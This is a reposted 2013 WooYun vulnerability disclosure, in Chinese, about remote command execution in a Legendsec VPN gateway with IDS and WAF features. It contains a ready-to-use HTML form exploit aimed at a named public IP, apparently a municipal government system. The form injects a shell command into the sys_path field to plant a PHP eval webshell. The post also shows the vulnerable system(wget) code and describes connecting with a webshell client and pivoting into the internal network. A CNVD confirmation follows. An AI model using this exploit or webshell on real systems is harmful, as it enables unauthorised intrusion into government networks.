linda

漏洞概要
缺陷编号：        WooYun-2013-27324
漏洞标题：        [再浅谈内网安全]--网神某带ids,waf网关设备完控0day又一枚
相关厂商：        网神
漏洞作者：        紫梦芊
提交时间：        2013-07-01 11:51
公开时间：        2013-09-29 11:51
漏洞类型：        设计不当
危害等级：        低
自评Rank：        3
漏洞状态：        已交由第三方厂商(cncert国家互联网应急中心)处理
漏洞来源：        http://www.wooyun.org
Tags标签：       远程命令执行 硬件安全 VPN IDS WAF

漏洞详情披露状态：
2013-07-01：        细节已通知厂商并且等待厂商处理中
2013-07-05：        厂商已经确认，细节仅向厂商公开
2013-07-08：        细节向第三方安全合作伙伴开放
2013-07-15：        细节向核心白帽子及相关领域专家公开
2013-07-25：        细节向普通白帽子公开
2013-08-14：        细节向实习白帽子公开
2013-09-29：        细节向公众公开

简要描述：之前发布的国内外VPN网关0day包括了网神 现在再爆他们带ids和waf版本远程命令执行的0day一枚

问题很普通。
详细说明：话不多说直接上0day.


code 区域<form action="https://221.202.118.50/admin/ids/waf_update.php" method="post">
<input type="hidden" name="uptype" value="1">
<input type="hidden" name="sys_path" value="http://update.cisco.com/tmp.bin -O /data/upload/__ids_up__.bin || echo '<? eval($_POST[cmd])?>' >/ssl/www/bug2.php ||whoami ">
<input type="submit" name="Submit">
</form>

221.202.118.50 是葫芦岛市绩效考核系统 这个应该是网神VPN最新版本 感觉用户体验还不赖





来看看问题出在哪儿


code 区域include_once "management/system.php";
include_once "management/ids.php";

$uptype =1;
if ($_FILES['ids_file'] || isset($_POST["sys_path"])) {
        $uptype = $_POST["uptype"];
        if($_POST["uptype"] == 2){
                $file_size = $_FILES['ids_file']['size'];
                $file_type = $_FILES['ids_file']['type'];        
                $temp_name = $_FILES['ids_file']['tmp_name'];
                $file_name = $_FILES['ids_file']['name'];
                $file_name = str_replace("\\","",$file_name);
                $file_name = str_replace("'","",$file_name);
                $file_name = str_replace(" ","",$file_name);

                $file_path = $CFG_UPLOAD_PATH."__ids_up__.bin";

                //File Name Check
                if ( $file_name == "" ) {
                        echo "Invalid File Name Specified";
                        return;
                }
                $result = move_uploaded_file($temp_name, $file_path);
        }else{
                $file_path = "/data/upload/__ids_up__.bin";
                $url = trim($_POST["sys_path"]);
                $url ="http://".$url;
                system("wget -t 3 $url -O $file_path ");        
        }
        $SM = new IDSManager;
        $V = $SM->snort_update($ticket,$file_path);
}



看代码可以看出是能从web上传 也可以从sys_path参数获取到的地址下载 然后进行snort的升级

用system(wget)进行的下载 进行升级钱应该有个ticket判断 这个相当于session或token



还有一要素 management/system.php 和 management/ids.php 是没有在当前目录下的 所以执行0day后出现如此







看到这个Fatal error 很多人瞬间放弃 也许他们测试也测过这里 但是 我们的system在31行之前,无影响(这就是脚本语言的好处之一,运维可以说是噩梦之一,呵呵)

菜刀一连







还有些泄漏的源码 看来应该不大重要 但是不应该放在web目录下




漏洞证明：https://221.202.118.50/bug2.php cmd







葫芦岛市的用户不少 我在这里抛个砖,引点大家的玉





这个...完全只防了正规途径啊..





这个...依然





这个NAT配置是个很方便的东西 方便对iptables不熟悉的朋友进行内网渗透



PS:其实当前有不少数SOC以及IDS等防御方式不够完善,大多只对正规途径来的用户行为进行了审计防范,一些另类的方式或是不常用的方式并不审计,或审计较弱,还有普遍现象是大量无用信息没有归纳挖掘,网络管理员也懒得看了。
修复方案：找乌云官方进行乌云众测

(PS:你们竞争对手sinfor也做了众测)
版权声明：转载请注明来源 紫梦芊@乌云

漏洞回应
厂商回应：
危害等级：高
漏洞Rank：17
确认时间：2013-07-05 00:04
厂商回复：CNVD确认并复现所述情况，同时对于该设备进行分析后，检测发现若干暴露在互联网上的实例，可以初步确认通用性。拟由CNCERT直接联系厂商处置，同时将继续检测互联网上可能涉及政府和重要信息系统部门的事件，后续加强处置。

rank 17


最新状态：暂无
原文：http://www.wooyun.org/bugs/wooyun-2013-027324

[ 本帖最后由 linda 于 2015-10-28 17:27 编辑 ]